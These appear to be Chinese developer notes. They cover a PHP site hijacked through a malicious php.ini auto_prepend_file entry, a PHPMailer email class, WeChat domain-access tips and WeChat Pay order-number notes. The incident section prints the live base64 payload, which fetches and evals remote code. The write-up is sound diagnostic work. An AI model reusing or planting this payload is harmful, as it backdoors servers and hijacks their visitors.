网站全部php页面顶部莫名其妙被加上了以下图片内容(红框部分),但是源码中却没有问题,该内容会导致移动端显示被劫持到sq网站
最后排查发现是php配置文件php.ini中的auto_prepend_file =部分被添加了病毒内容,内容如下:
auto_prepend_file = "data:;base64,PD9waHAgaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCAib2ZmIik7ZXZhbCgnPz4nLmZpbGVfZ2V0X2NvbnRlbnRzKGJhc2U2NF9kZWNvZGUoJ2FIUjBjRG92THpndWFuTmpNakF5TkRRdVkyOXRPamd4TDJwell5OXFjMk11ZEhoMCcpKSk7Pz4="
该部分的内容的base64解析为以下内容:
可以看出解析后的内容使网站转向了一个sq网站,删除该内容问题解决;
但是未解决的是php.ini文件是如何被更改的,暂时还不清楚
<?php
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\Exception;
require 'vendor/autoload.php';
class Email
{
protected $config;
public function __construct()
{
// 以下配置可根据需要存储在数据库或在项目配置文件中存放
$this->config = [
// smtp 服务地址
'host' => 'smtp.qq.com',
// 邮箱的账号
'username' => '你的邮箱',
// 邮箱授权密码
'password' => '邮箱授权码',
// 端口
'port' => '465', // 建议使用465默认
// 发件人名称
'sender' => 'fenmy',
];
}
/**
* 发送邮件
* @param string $email 收件人邮箱
* @param string $subject 邮件主题
* @param string $body 邮件内容
* @param array $vars 邮件内容变量
* @param array $attachments 附件
* @return array
*/
public function sendEmail(string $email, string $subject, string $body, array $vars = [], array $attachments = [])
{
$mail = new PHPMailer(true);
try {
// 邮箱配置
$config = $this->config;
/**** 服务器设置 ****/
// 使用SMTP服务
$mail->isSMTP();
// smtp服务地址
$mail->Host = $config['host'];
// 设置是否进行权限校验
$mail->SMTPAuth = true;
// SMTP账号
$mail->Username = $config['username'];
// SMTP密码(客户端授权密码,注意不是登录密码)
$mail->Password = $config['password'];
// 使用ssl协议
$mail->SMTPSecure = PHPMailer::ENCRYPTION_SMTPS;
// 端口设置
$mail->Port = $config['port'];
// 字符集设置,防止中文乱码
$mail->CharSet = 'utf-8';
/**** 发件人 ****/
// 设置邮箱的来源,与邮箱的账号一致,名称随意
$mail->setFrom($config['username'], $config['sender']);
// 设置回复地址,一般与来源保持一致
$mail->addReplyTo($config['username'], $config['sender']);
/**** 收件人 ****/
// 设置收件人的邮箱地址
$mail->addAddress($email);
/**** 附件 ****/
foreach ($attachments as $key => $val) {
$path = $key;
$name = '';
if (is_numeric($key)) {
$path = $val;
} else {
$name = $val;
}
// 添加附件
$mail->addAttachment($path, $name);
}
/**** 发送内容 ****/
// 是否为 HTML 格式
$mail->isHTML(true);
// 主题
$mail->Subject = $subject;
// 正文
foreach ($vars as $key => $val) {
$search = '{' . $key . '}';
$body = str_replace($search, (string) $val, $body);
}
$mail->Body = $body;
// 发送邮件
$mail->send();
return ['code' => 200, 'msg' => '发送成功', 'data' => null];
} catch (Exception $e) {
return ['code' => 500, 'msg' => $e->getMessage(), 'data' => null];
}
}
}
$res = (new Email())->sendEmail(
'收件人邮箱',
'邮箱验证提醒',
'尊敬的用户,您的验证码为:{code},请勿泄漏于他人!',
['code' => rand(100000, 999999)]
);
var_dump($res);
composer require phpmailer/phpmailer
(网站是否备案并不影响直接打开的,当然最好进行备案,备案的域名无违规情况下是可以直接访问的)
备案/非备案无法直接打开解决办法:
1.确定域名下的网站没有违规内容(有违规内容清楚且申诉)
2.申请一个公众号(如果有),则在公众号后台配置配置你的域名
路径:公众号设置--功能设置--将下面三个域名的设置都设置了
如图 #其中需要将一份文件下载下来放到域名对应网站的根目录下
1.订单号唯一组成:order_sn + 'X' + order_log + 'X' + time() , 取订单号时使用explode('X', 自定义订单号)
2.如果是使用商城内二维码形式的,在flow.dwt和user_transaction.dwt中增加弹窗(关键词:wxpay_dialog)和修改查询支付成功部分(关键词:checkorder())